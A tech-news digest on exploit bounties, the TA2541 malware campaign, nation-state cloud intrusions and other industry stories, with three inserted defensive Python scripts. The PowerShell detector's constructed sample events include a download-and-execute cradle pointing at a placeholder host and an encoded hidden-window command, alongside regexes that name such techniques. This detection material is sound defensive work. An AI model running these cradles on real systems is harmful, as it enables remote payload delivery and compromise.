More stories

  • Security: Google to pay up to $91,337 for exploits of new Linux and Kubernetes bugs

    Image: isak55/Shutterstock
    Google will pay between $20,000 and $91,337 to researchers who create exploits for vulnerabilities in the Linux kernel, the Kubernetes container management system, and Google Cloud’s Kubernetes Engine. This builds on the three-month bounty Google introduced in November, when it tripled rewards for exploits against new and previously unknown Linux kernel bugs. The idea was that the crowd would uncover new kernel exploitation techniques, in particular ones relevant to services running on Kubernetes in the cloud.

    Researchers needed to show they could use the exploit for a given bug to compromise Google’s kCTF (Kubernetes Capture The Flag) cluster and obtain a ‘flag’, a secret hidden in a program, within the context of a competition, which in this case was held on Google’s cluster.

    Google considered the expanded program a success, and so it will extend it to at least the end of 2022. But it has also made a number of changes covering rules, conditions and rewards. First, the updated and extended program increases the maximum reward for a single exploit from $50,337 to $91,337. On the success side of the existing trial, Google said it received nine submissions in the three months and paid out over $175,000 in rewards. The submissions included five zero-days (previously unknown flaws) and two exploits for ‘1days’ (flaws that had only just been disclosed). Three have been fixed and made public: CVE-2021-4154, CVE-2021-22600 and CVE-2022-0185, according to Google.

    Google is changing the reward structure “slightly”. It will now pay $31,337 “to the first valid exploit submission for a given vulnerability” and will pay nothing for duplicate exploits. However, it says some bonuses may still apply to duplicate exploits. These include: $20,000 for exploits for 0day vulnerabilities; $20,000 for exploits for vulnerabilities that do not require unprivileged user namespaces (CLONE_NEWUSER); and $20,000 for exploits using novel exploit techniques (previously it paid nothing for these). “These changes increase some 1day exploits to 71,337 USD (up from 31,337 USD), and makes it so that the maximum reward for a single exploit is 91,337 USD (up from 50,337 USD),” Google notes.

    On what it considers novel techniques, Google explains it is looking for “powerful” ones: “[N]ovel technique could be the exploitation of previously unknown objects to transform a limited primitive into a more powerful one, such as an arbitrary/out-of-bounds read/write or arbitrary free. For example, in all our submissions, researchers leveraged message queues to achieve kernel information leaks. We are looking for similarly powerful techniques that allow heap exploits to be ‘plugged in’ and immediately allow kernel access. Another example is bypassing a common security mitigation or a technique for exploiting a class of vulnerabilities more reliably.”

    This Linux kernel exploitation bug bounty is a small part of Google’s overall Vulnerability Reward Programs covering Android, Chrome and other open-source projects. In 2021, Google paid out $8.7 million in rewards, $2.9 million of which was for Android bugs and $3.3 million for Chrome bugs. Last year’s total rose from $6.7 million in 2020.
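    The reward tiers above turn on whether an exploit needs unprivileged user namespaces (CLONE_NEWUSER), because much of the kernel attack surface used by container escapes is only reachable once an unprivileged process has created one. The script below is an added example, not Google’s or kCTF’s code: it reports the relevant sysctls and then actually attempts unshare(CLONE_NEWUSER) in a forked child, so an operator can confirm whether that precondition holds on a node. It assumes a glibc-based Linux host and that it is run as an unprivileged user (as root the call normally succeeds regardless of policy); the Debian/Ubuntu-only sysctl kernel.unprivileged_userns_clone is reported as absent on other kernels.

```python
"""Probe whether an unprivileged process can create a user namespace.

Added example, not part of the original article or of Google's kCTF code.
Assumes Linux with glibc (ctypes loads libc) and Python 3.8+.
"""
import ctypes
import errno
import os
from pathlib import Path

CLONE_NEWUSER = 0x10000000  # value from <linux/sched.h>

# kernel.unprivileged_userns_clone exists only on Debian/Ubuntu-patched
# kernels; user.max_user_namespaces is upstream. Absence is reported, not an error.
SYSCTLS = {
    "user.max_user_namespaces": "/proc/sys/user/max_user_namespaces",
    "kernel.unprivileged_userns_clone": "/proc/sys/kernel/unprivileged_userns_clone",
}


def read_sysctls(table=SYSCTLS):
    """Return {name: value or None} for each sysctl path that can be read."""
    out = {}
    for name, path in table.items():
        try:
            out[name] = Path(path).read_text().strip()
        except OSError:
            out[name] = None
    return out


def _try_unshare_newuser():
    """Call unshare(CLONE_NEWUSER) in this process; return 0 on success, else errno."""
    libc = ctypes.CDLL(None, use_errno=True)
    if libc.unshare(CLONE_NEWUSER) == 0:
        return 0
    return ctypes.get_errno()


def classify(err):
    """Map the unshare() outcome to what it means for exploit preconditions."""
    if err == 0:
        return "allowed"
    # EPERM: sysctl, seccomp or LSM denial; ENOSPC: user.max_user_namespaces
    # exhausted (or set to 0); EINVAL: kernel built without CONFIG_USER_NS.
    if err in (errno.EPERM, errno.EACCES, errno.ENOSPC, errno.EINVAL):
        return "denied"
    return "unknown"


def probe_unprivileged_userns():
    """Attempt CLONE_NEWUSER in a forked child so the caller's namespaces stay untouched.

    Returns 'allowed', 'denied' or 'unknown'.
    """
    try:
        pid = os.fork()
    except OSError:
        return "unknown"
    if pid == 0:
        os._exit(min(_try_unshare_newuser(), 255))
    _, status = os.waitpid(pid, 0)
    if not os.WIFEXITED(status):
        return "unknown"
    return classify(os.WEXITSTATUS(status))


if __name__ == "__main__":
    for name, value in read_sysctls().items():
        print(f"{name} = {value if value is not None else '(not present)'}")
    print(f"unprivileged unshare(CLONE_NEWUSER): {probe_unprivileged_userns()}")
```

    A result of "allowed" on a node that is not meant to give workloads user-namespace access is the thing to fix; "denied" with user.max_user_namespaces above zero usually points at a seccomp profile or LSM policy doing the blocking, which is worth confirming rather than assuming.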

  • Warning over mysterious hackers that have been targeting aerospace and defence industries for years

    An unknown criminal hacking group is targeting organisations in the aviation, aerospace, defence, transportation and manufacturing industries with trojan malware, in attacks that researchers say have been going on for years. Dubbed TA2541 and detailed by cybersecurity researchers at Proofpoint, the persistent cyber-criminal operation has been active since 2017 and has compromised hundreds of organisations across North America, Europe, and the Middle East.

    Despite running for years, the attacks have barely evolved, broadly following the same targeting and themes; once inside, the attackers remotely control compromised machines, conduct reconnaissance on networks and steal sensitive data.

    “What’s noteworthy about TA2541 is how little they’ve changed their approach to cybercrime over the past five years, repeatedly using the same themes, often related to aviation, aerospace, and transportation, to distribute remote access trojans,” said Sherrod DeGrippo, vice president of threat research and detection at Proofpoint. “This group is a persistent threat to targets throughout the transportation, logistics, and travel industries.”

    Attacks begin with phishing emails designed to be relevant to individuals and businesses in the sectors being targeted. For example, one lure sent to targets in aviation and aerospace resembles a request for aircraft parts, while another is designed to look like an urgent request for air ambulance flight details. At one point, the attackers introduced COVID-19-themed lures, although these were soon dropped.

    While the lures aren’t highly customised and follow regular templates, the sheer number of messages sent over the years (hundreds of thousands in total) and their implied urgency are enough to fool some victims into downloading malware. The messages are nearly always in English.

    TA2541 initially sent emails containing macro-laden Microsoft Word attachments that downloaded the Remote Access Trojan (RAT) payload, but the group has recently shifted to using Google Drive and Microsoft OneDrive URLs, which lead to an obfuscated Visual Basic Script (VBS) file. Running one of these files, whose names follow the same themes as the initial lures, executes PowerShell that downloads malware onto the Windows machine. The cyber criminals have distributed over a dozen different trojan payloads since the campaigns began, all of which are available to buy on dark web forums or can be downloaded from open-source repositories.

    Currently, the most commonly delivered malware in TA2541 campaigns is AsyncRAT, but other popular payloads include NetWire, WSH RAT and Parallax. Whichever malware is delivered, it is used to gain remote control of infected machines and steal data, although researchers note that they still don’t know what the ultimate goal of the group is, or where it operates from. The campaign is still active and researchers warn that the attackers will continue to distribute phishing emails and deliver malware to victims around the world.
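    The delivery chain described above (a VBS file run by the Windows script host, which in turn launches PowerShell to fetch the payload) leaves a distinctive parent/child process pattern. The following is an added example, not Proofpoint’s detection content: it scores process-creation events for a script host or Office application spawning PowerShell with download-cradle indicators on the command line. The events are constructed to resemble Sysmon Event ID 1 fields (Image, ParentImage, CommandLine, ProcessId); the hostnames, paths and base64 blob in them are invented.

```python
"""Flag script-host -> PowerShell download cradles in process-creation events.

Added example, not Proofpoint's or any vendor's detection content. The
SAMPLE_EVENTS below are constructed to resemble Sysmon Event ID 1 records.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}          # VBS/JS delivery
OFFICE_APPS = {"winword.exe", "excel.exe"}              # macro-document delivery
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# (indicator name, regex applied to the PowerShell command line)
CRADLE_INDICATORS = [
    ("download-method", re.compile(r"downloadstring|downloadfile|downloaddata", re.I)),
    ("web-request", re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|start-bitstransfer", re.I)),
    ("encoded-command", re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden-window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("iex", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("remote-url", re.compile(r"https?://", re.I)),
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event):
    """Return (severity, reasons) for one process-creation event."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    if image not in POWERSHELL:
        return ("none", [])
    cmdline = event.get("CommandLine", "")
    reasons = [name for name, rx in CRADLE_INDICATORS if rx.search(cmdline)]
    if parent in SCRIPT_HOSTS or parent in OFFICE_APPS:
        # PowerShell under a script host or Office app is suspicious on its own;
        # any cradle indicator on top of that makes it high.
        reasons.insert(0, f"parent={parent}")
        return ("high" if len(reasons) > 1 else "medium", reasons)
    # From other parents, require two independent cradle indicators.
    return ("medium" if len(reasons) >= 2 else "none", reasons)


def detect(events):
    """Return findings for every event that scores above 'none'."""
    findings = []
    for ev in events:
        severity, reasons = assess(ev)
        if severity != "none":
            findings.append({"pid": ev["ProcessId"], "severity": severity, "reasons": reasons})
    return findings


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    {"ProcessId": 4412,
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://files.example.invalid/quote.txt')\""},
    {"ProcessId": 4420,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ProcessId": 5180,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    {"ProcessId": 612,
     "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

    The parent-process check does the heavy lifting here; the command-line indicators mostly adjust severity, which keeps an administrator’s signed script run from Explorer out of the queue while still catching an obfuscated, encoded launch from a Word document.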

  • F5 launches new SaaS app security cloud, edge computing platform

    F5 has launched a new software-as-a-service (SaaS) platform aimed at simplifying how customers consume the firm’s expanding portfolio of security products.

    Over the past few years, F5 has expanded its offerings with software and cloud services designed to tackle the gap between the enterprise push toward digital transformation and an existing reliance on legacy systems. According to an F5 survey, 88% of organizations say they operate both legacy and modern architectures today. When those systems, along with Internet of Things (IoT) and edge devices, cloud, remote collaboration tools and mobile, all have to be considered by IT teams as potential attack vectors, managing the resulting complexity and risk is a challenge.

    On Tuesday, the application security company said the portfolio expansion, called F5 Distributed Cloud Services, will “provide security, multi-cloud networking, and edge-based computing solutions.” F5 Distributed Cloud merges technologies F5 obtained by acquiring Volterra and Shape Security. It includes multi-cloud networking (MCN), cloud load balancing, cloud-native computing capabilities for edge use cases, and a Kubernetes Gateway.

    The service will also include a new offering launched today, called F5 Distributed Cloud WAAP (Web Application and API Protection). WAAP integrates F5’s web application firewall (F5 Advanced WAF), bot mitigation (F5 Shape AI), distributed denial-of-service (DDoS) monitoring, and API defenses based on Volterra’s machine learning technologies. The SaaS suite is meant to let teams deploy each component automatically and as a set.

    “Today’s applications and business models are adapting faster than ever, and that means app security and infrastructure need to be much more agile and effective,” commented Haiyan Song, GM of the Security & Distributed Cloud Product Group at F5. “We are rapidly integrating our portfolio of services onto a distributed cloud services platform and continually innovating new services, so our customers can have the capabilities they need at the pace they require to achieve their ongoing business transformation.”

  • Cybersecurity: These countries are the new hacking threats to fear as offensive campaigns escalate

    The number of hostile nation-state hacking operations is rising as new countries invest in cyber-intrusion campaigns and existing state-backed attack groups take advantage of the growing number of organisations adopting cloud applications. Crowdstrike’s 2022 Global Threat Report details how the cyber-threat landscape has evolved during the past year. One of those developments is the rise of new countries engaging in offensive cyber operations, including Turkey and Colombia.

    In accordance with Crowdstrike’s naming conventions, attacks by Turkish-linked groups are labelled ‘Wolf’, while Colombian operations have been dubbed ‘Ocelot’, in the same way that cybersecurity researchers name Russian government-backed activity ‘Bear’ and Chinese hacking groups ‘Panda’.

    Activity by one of these new groups is detailed in the report: a Turkey-based hacking group, dubbed Cosmic Wolf by researchers, targeted data belonging to an unspecified victim and stored in an Amazon Web Services (AWS) cloud environment in April 2021. The attackers broke into the AWS environment using stolen usernames and passwords, which also carried enough privilege to change the environment’s configuration from the command line. That let them alter security settings to allow direct Secure Shell (SSH) access to the AWS environment from their own infrastructure, enabling the theft of data.

    Ultimately, countries are seeing that cyber campaigns can be easier to conduct than traditional espionage and are investing in these techniques.
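    The Cosmic Wolf intrusion above is a case where the stolen credential was used to rewrite a security group so SSH from attacker-controlled addresses would be accepted. That configuration change is itself an API call recorded by CloudTrail, and is exactly the kind of misconfiguration the report says should be monitored. The script below is an added example, neither CrowdStrike’s nor AWS’s code: it triages CloudTrail records for AuthorizeSecurityGroupIngress calls that expose port 22 to any range outside an allowlist, and carries the calling identity and source IP into each finding so an unfamiliar source address stands out. The event layout follows CloudTrail’s EC2 request-parameter shape as the author understands it (requestParameters.ipPermissions.items[].ipRanges.items[].cidrIp); the allowlist, account ID and sample records are constructed.

```python
"""Triage CloudTrail records for security-group changes that expose SSH.

Added example, not CrowdStrike's or AWS's code. Field names follow CloudTrail's
EC2 AuthorizeSecurityGroupIngress request parameters as the author understands
them; ALLOWED_SSH_SOURCES and SAMPLE_TRAIL are constructed for illustration.
"""
import ipaddress
import json

# Assumed sanctioned SSH sources (e.g. a bastion or corporate egress range).
# TEST-NET-3 stands in for a real corporate range.
ALLOWED_SSH_SOURCES = [ipaddress.ip_network("203.0.113.0/24")]
SSH_PORT = 22


def permission_covers_port(perm, port):
    """True if an ipPermissions entry reaches `port` (protocol -1 means all traffic)."""
    proto = str(perm.get("ipProtocol"))
    if proto == "-1":
        return True
    if proto != "tcp":
        return False
    return int(perm.get("fromPort", 0)) <= port <= int(perm.get("toPort", 65535))


def unsanctioned_cidrs(perm, allowed=ALLOWED_SSH_SOURCES):
    """CIDRs in this permission that are not fully contained in an allowed range."""
    out = []
    for r in perm.get("ipRanges", {}).get("items", []):
        cidr = r.get("cidrIp")
        if not cidr:
            continue
        net = ipaddress.ip_network(cidr, strict=False)
        if not any(net.version == a.version and net.subnet_of(a) for a in allowed):
            out.append(cidr)
    return out


def ssh_exposures(event, allowed=ALLOWED_SSH_SOURCES):
    """Findings for one CloudTrail record; [] if the record is not of interest."""
    if (event.get("eventSource") != "ec2.amazonaws.com"
            or event.get("eventName") != "AuthorizeSecurityGroupIngress"):
        return []
    params = event.get("requestParameters", {})
    findings = []
    for perm in params.get("ipPermissions", {}).get("items", []):
        if not permission_covers_port(perm, SSH_PORT):
            continue
        for cidr in unsanctioned_cidrs(perm, allowed):
            findings.append({
                "time": event.get("eventTime"),
                "actor": event.get("userIdentity", {}).get("arn"),
                "from_ip": event.get("sourceIPAddress"),
                "group": params.get("groupId"),
                "cidr": cidr,
                "world": cidr.endswith("/0"),
            })
    return findings


def triage(records, allowed=ALLOWED_SSH_SOURCES):
    """Run ssh_exposures over a list of CloudTrail records."""
    out = []
    for ev in records:
        out.extend(ssh_exposures(ev, allowed))
    return out


# Constructed records (account 123456789012 is the AWS documentation example ID).
SAMPLE_TRAIL = json.loads("""[
 {"eventTime": "2021-04-12T08:01:10Z", "eventSource": "ec2.amazonaws.com",
  "eventName": "DescribeInstances", "sourceIPAddress": "203.0.113.10",
  "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ops-bob"}},
 {"eventTime": "2021-04-12T08:05:44Z", "eventSource": "ec2.amazonaws.com",
  "eventName": "AuthorizeSecurityGroupIngress", "sourceIPAddress": "203.0.113.10",
  "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ops-bob"},
  "requestParameters": {"groupId": "sg-0a1b2c3d", "ipPermissions": {"items": [
    {"ipProtocol": "tcp", "fromPort": 443, "toPort": 443,
     "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
 {"eventTime": "2021-04-12T23:47:02Z", "eventSource": "ec2.amazonaws.com",
  "eventName": "AuthorizeSecurityGroupIngress", "sourceIPAddress": "198.51.100.7",
  "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ops-bob"},
  "requestParameters": {"groupId": "sg-0a1b2c3d", "ipPermissions": {"items": [
    {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
     "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}},
    {"ipProtocol": "-1",
     "ipRanges": {"items": [{"cidrIp": "198.51.100.7/32"}]}}]}}},
 {"eventTime": "2021-04-13T09:12:30Z", "eventSource": "ec2.amazonaws.com",
  "eventName": "AuthorizeSecurityGroupIngress", "sourceIPAddress": "203.0.113.10",
  "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ops-bob"},
  "requestParameters": {"groupId": "sg-0a1b2c3d", "ipPermissions": {"items": [
    {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
     "ipRanges": {"items": [{"cidrIp": "203.0.113.0/25"}]}}]}}}
]""")

if __name__ == "__main__":
    for f in triage(SAMPLE_TRAIL):
        print(f)
```

    The third record is the interesting one: the same IAM user that normally acts from the sanctioned range suddenly opens SSH to the world, and to a /32 outside the allowlist, from an address that is not in the allowlist either. Correlating the finding’s from_ip with the identity’s usual source addresses is what separates a stolen credential from an engineer working late.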

    “There are a lot of countries out there that look at this and realise it’s cheaper, it’s easier and it’s got plausible deniability built into it,” Adam Meyers, senior vice president of intelligence at Crowdstrike, told ZDNet. “That’s what’s happening – we’re seeing more countries have developed these programmes and they’re going to get better at it over time.”

    One of the reasons countries are increasing their offensive cyber capabilities is the impact of the global pandemic. Lockdowns and stringent travel checks made traditional espionage techniques harder to carry out, pushing investment towards cyber operations. “It’s created a little bit more demand or accelerated planning around developing cyber capabilities for some of these countries that would have perhaps relied on other means previously,” said Meyers.

    The shift towards cloud applications and cloud IT services has also played an unwitting role in making cyberattacks easier. The rise of hybrid working means many employees aren’t based in an office, instead connecting remotely via collaboration applications, VPNs and other services, using a username and password. That makes being productive while working remotely simpler for employees, but it has also made things simpler for hacking groups, who can quietly access networks with a stolen, or guessed, username and password. Some of the biggest cybersecurity incidents of recent years, like the SolarWinds and Microsoft Exchange attacks, have demonstrated how powerful an attack targeting cloud services and cloud supply chains can be, particularly if the cloud is misconfigured or poorly monitored.

    “As organisations are moving to the cloud and looking to develop better capabilities, threat actors are moving there as well,” said Meyers.

    There are, however, steps organisations can take to make their networks and cloud infrastructure more resistant to attack, including adopting a zero-trust strategy in which devices connecting to the network are not trusted by default. The report also recommends that organisations work towards eliminating misconfigurations in their cloud applications and services by defining standard patterns for cloud deployment, so that new accounts are set up in a predictable manner and human error is less likely to go undetected. Cloud infrastructure should also be monitored and kept current with security updates, like any other software.

  • Canada includes crypto and crowdfunding under laundering and terrorism finance laws

    Images: Sopa Images/Getty Images
    Canada’s Deputy Prime Minister and Minister of Finance Chrystia Freeland has announced the government is broadening the scope of the country’s anti-money laundering and terrorist financing laws to cover crowdfunding platforms and the payment service providers they use. “These changes cover all forms of transactions, including digital assets such as crypto currencies,” she announced during a press conference on Monday night. “The illegal blockades have highlighted the fact that crowdfunding platforms and some of the payment service providers they use are not fully captured under the proceeds of crime and terrorist financing act. Our banks and financial institutions are already obligated to report to the Financial Transactions and Reports Analysis Centre of Canada, or FINTRAC. As of today, all crowdfunding platforms and the payment service providers they use must register with FINTRAC, and they must report large and suspicious transactions to FINTRAC.”

    The expanded rules are a response to the ongoing “Freedom Convoy” protests, started by Canadian truck drivers opposing COVID-19 vaccination and quarantine mandates for cross-border drivers, which have shut down border crossings and brought downtown Ottawa to a halt. The protests, now in their third week, have been partly funded by donors to the crowdfunding platform GiveSendGo. The platform was hacked on Sunday night, however, resulting in thousands of donor details being stolen. Nonprofit leak site Distributed Denial of Secrets says it has obtained donor information for the Freedom Convoy campaign from the GiveSendGo platform as of Sunday, including self-reported names, email addresses, and ZIP codes.

    Distributed Denial of Secrets said it would only provide the data to researchers and journalists. At the same time, Prime Minister Justin Trudeau invoked rarely used emergency powers under the Emergencies Act in an attempt to quell the protests. The Emergencies Act gives the government powers for 30 days to ban people from gathering in certain locations, allow officials to tow private vehicles blocking roads, and let financial institutions block funds used to support illegal blockades.

    “The Emergencies Act will be used to strengthen and support law enforcement agencies at all levels across the country. This is about keeping Canadians safe, protecting people’s jobs and restoring confidence in our institutions,” Trudeau said. “We cannot and will not allow illegal and dangerous activities to continue,” he continued, assuring that the government will not use the Emergencies Act to call in the military. “We’re not suspending fundamental rights or overriding the Charter of Rights and Freedoms. We are not limiting people’s freedom of speech. We are not limiting freedom of peaceful assembly. We are not preventing people from exercising their right to protest legally,” Trudeau added.

  • eSafety grilled about lack of WA Police awareness on its new takedown powers

    Image: Asha Barbaschow/ZDNet
    Australia’s eSafety commissioner Julie Inman Grant was questioned by senators on Tuesday morning about the efficacy of the recently enacted Online Safety Act, which expanded the commissioner’s takedown powers to cover more cyberbullying content (including content targeting adults), intimate images shared without the subject’s consent, abhorrent violent material, and restricted content. The grilling arose in response to a letter written by Western Australia Police Minister Paul Papalia to Federal Communications Minister Paul Fletcher that called for the Online Safety Act powers to be used more expeditiously. Papalia wrote the letter after a TikTok video surfaced online of a stolen vehicle, occupied by boys aged 11 and 12 and a girl aged 13, ramming a police car into a tree in Broome and injuring two police officers. The video was posted by the children shortly before they crashed the vehicle.

    Explaining the aftermath, Inman Grant said her agency was not aware of the TikTok content until Papalia’s letter was published by a media outlet on Sunday evening. After becoming aware of the letter, the eSafety commissioner said her agency contacted WA Police, Snapchat, and TikTok to ascertain what actions were being taken. Prior to the eSafety commissioner’s office reaching out to WA Police, however, the police agency had made no contact with the commissioner about the incident, and it has not filed any complaints with the agency as yet either. When asked about the various ways WA Police can work with the eSafety commissioner to exercise the latter’s powers, Inman Grant conceded that a memorandum of understanding (MoU) with WA Police covering the new Online Safety Act capabilities was not yet in place. Inman Grant noted, however, that an MoU is not necessary for law enforcement to report harmful content to her agency.

    She also said her agency recently hired new law enforcement liaison staff who would be specifically tasked with updating its MoUs with federal and state law enforcement agencies. “[MoUs] help guide protocol, but if a police agency came to us needing help with removal we wouldn’t require an MOU to do that,” Inman Grant said.

    Minister for Superannuation, Financial Services and the Digital Economy Jane Hume, who appeared alongside Inman Grant before Senate Estimates, then laid the blame for the Online Safety Act not being exercised in this incident at Papalia’s feet, saying he was “entirely aware that it was a cybercrime well in advance, so he could have made the complaint”. In response, Labor Senator Louise Pratt criticised the eSafety commissioner’s efforts to raise awareness of how to make use of the Online Safety Act’s takedown powers, since the agency’s media campaign so far has focused on updating the eSafety website. “If the creative is ready, surely they should spend it here and now rather than saving the expenditure of that creative. Frankly, when prices escalate because there’s more competition for a media buy during an election campaign,” Pratt said. At the time of writing, the eSafety website’s home page did not have a direct link to the page for reporting harmful content; on search engines, meanwhile, results for the eSafety website included a sub-result pointing to the reporting page.

    The eSafety commissioner did not respond directly to Pratt’s critique, saying: “We have been the eSafety regulators since 2015. Not every single citizen or organisation may be aware of us; we do whatever we can in our power to let as many people know and we’ll continue to do that. I’m not sure what more I can say. I think this is like any public health campaign. Behavioural change takes a really long time.”

    Providing an update on the Online Safety Act’s powers since they came into force three weeks ago, Inman Grant said her agency has handled more than 200 complaints from Australian adults experiencing abuse and harassment online. Representing an 85% increase compared to the same period a year ago, these complaints have concerned explicit instructions and encouragement to commit suicide, threats of murder, and the menacing publication of personal details online.

  • Foxconn and Vedanta to manufacture semiconductors in India under new JV

    Taiwanese electronics manufacturing giant Foxconn and Indian conglomerate Vedanta have signed a memorandum of understanding to form a joint venture that will manufacture semiconductors in India. Under the MoU, Vedanta will hold the majority stake in the JV, while Foxconn will be a minority shareholder. Vedanta chairman Anil Agarwal will also chair the new joint venture, the companies said. “This first-of-its-kind joint venture between the two companies will support Indian Prime Minister Narendra Modi’s vision to create an ecosystem for semiconductor manufacturing in India,” the companies added. The location for the new chip plant is still being finalised with a number of state governments in India, according to the companies.

    At the end of last year, the Indian government announced a plan to put ₹2,30,000 crore, around $30 billion, behind turning India into a semiconductor manufacturing powerhouse. The government added that it would put ₹55,392 crore, around $7.5 billion, behind its electronics manufacturing schemes, which cover large-scale electronics manufacturing, IT hardware, promotion activities, and electronics manufacturing clusters. Establishing a semiconductor facility comes at a time when electronics makers continue to struggle with the global chip shortage, which has been predicted to last until early 2023.

    Also in India, the union government has banned a further 54 Chinese apps, including ones owned by Tencent and Alibaba. The order was issued by the Ministry of Electronics and IT under section 69A of the Information Technology Act, as reported by the Economic Times. “The 54 apps have already been blocked from being accessed in India through the [Google] Play Store,” an official told ET. “Many of the apps from the stable of Tencent and Alibaba, have changed hands to hide ownership. They are also being hosted out of countries like Hong Kong or Singapore, but the data was ultimately going to servers in Chinese destinations.” This latest ban is in addition to the 59 Chinese apps that have been barred in India since June 2020, which included TikTok, Weibo, and WeChat.

  • SEC issues warning to crypto lenders as BlockFi hit with $100m in fines

    Image: snjivo/Shutterstock
    The US Securities and Exchange Commission (SEC) has found that crypto lender BlockFi operated for 18 months as an unregistered investment company. The company offered BlockFi Interest Accounts (BIAs), in which users lent crypto assets to BlockFi in return for a variable monthly interest payment; the SEC found these were securities, and therefore BlockFi needed to register with the regulator. Along with the findings, BlockFi has agreed to pay a $50 million penalty to settle with the SEC and another $50 million to settle similar charges in 32 states. The company will also stop offering unregistered products, seek registration of a new lending product, and has 60 days to bring its business into compliance. BlockFi was also found to have made a false and misleading statement on its site for over two years about the level of risk in its loan portfolio and lending activity.

    “This is the first case of its kind with respect to crypto lending platforms,” SEC chair Gary Gensler said. “Today’s settlement makes clear that crypto markets must comply with time-tested securities laws, such as the Securities Act of 1933 and the Investment Company Act of 1940. It further demonstrates the Commission’s willingness to work with crypto platforms to determine how they can come into compliance with those laws.” The SEC added that the rest of the crypto lending ecosystem should “take immediate notice of today’s resolution” and comply with US securities laws.

    BlockFi framed the announcement as making it the first company under a “new regulatory framework for crypto sector”. “From the day we started BlockFi, we have always known that strong engagement with regulators would be critical for the adoption of financial services powered by cryptocurrencies. Today’s milestone is yet another example of our pioneering efforts in securing regulatory clarity for the broader industry and our clients, just as we did for our first product, the crypto-backed loan,” CEO and founder Zac Prince said. “We intend for BlockFi Yield to be a new, SEC-registered crypto interest-bearing security, which will allow clients to earn interest on their crypto assets.” The company added that existing customers will keep their accounts but cannot add to them, and that users will be moved to the Yield product unless they tell the company not to. Users outside the US can continue using BIAs as before.